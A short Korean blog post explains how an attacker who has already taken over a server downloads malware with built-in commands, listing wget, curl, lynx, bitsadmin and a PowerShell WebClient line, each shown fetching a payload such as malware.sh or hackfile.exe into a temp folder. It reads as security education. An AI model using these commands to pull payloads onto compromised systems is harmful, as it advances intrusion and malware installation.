해커가 보안 취약점을 이용하여 시스템 장악후 외부 사이트로 부터 어떤 방법을 이용하여 악성코드를 다운로드 할까요? 가장 보편적인 방법으로는 OS 자체 명령어를 사용 하여 악성코드를 다운로드 합니다.
전제 조건
- 보안 취약점을 이용하여 시스템 장악 완료
- OS (LINUX, Windows) 기본 명령어를 제어 할수 있는 권한 획득
- 피해 서버 <-> 아웃바운드(인터넷) 네트워크 통신 가능 상태
Linux OS
wget 명령어 파일 다운로드
wget https://min.tistory.com/code.sh
wget https://min.tistory.com/code.sh -P files/download -O hack.sh
-P 디렉토리 저장
-O 파일명 지정
-b 백그라운드 실행curl 명령어 파일 다운로드
curl https://min.story.com/download/malware.exe -o malware.exe
curl -O https://min.story.com/download/malware.sh .
curl -O https://min.story.com/download/malware.sh > /tmp/malware.shlynx 명령어 파일 다운로드
lynx -source https://min.story.com/sitemap.xml > sitemap.xmlWindows OS
bitsadmin 명령어 파일 다운로드
bitsadmin /transfer 작업명 /download 받는 파일URL 로컬경로파일
bitsadmin / transfer myjob01 / download / priority normal
https://mi.story.com/test.exe c:\windows\temp\hackfile.exepowershell 파일 다운로드
$client = New-Object System.Net.WebClient
$client.DownloadFile("http://91.x1.1x.10x/TWsTWqgRFxxxxx.exe","C:\Windows\TEMP\CAU81xxx.exe")명령어별로 수없이 다양한 옵션이 있지만 기본적인 옵션에 대해서만 설명하였습니다. 부디 도움이 되길 바랍니다.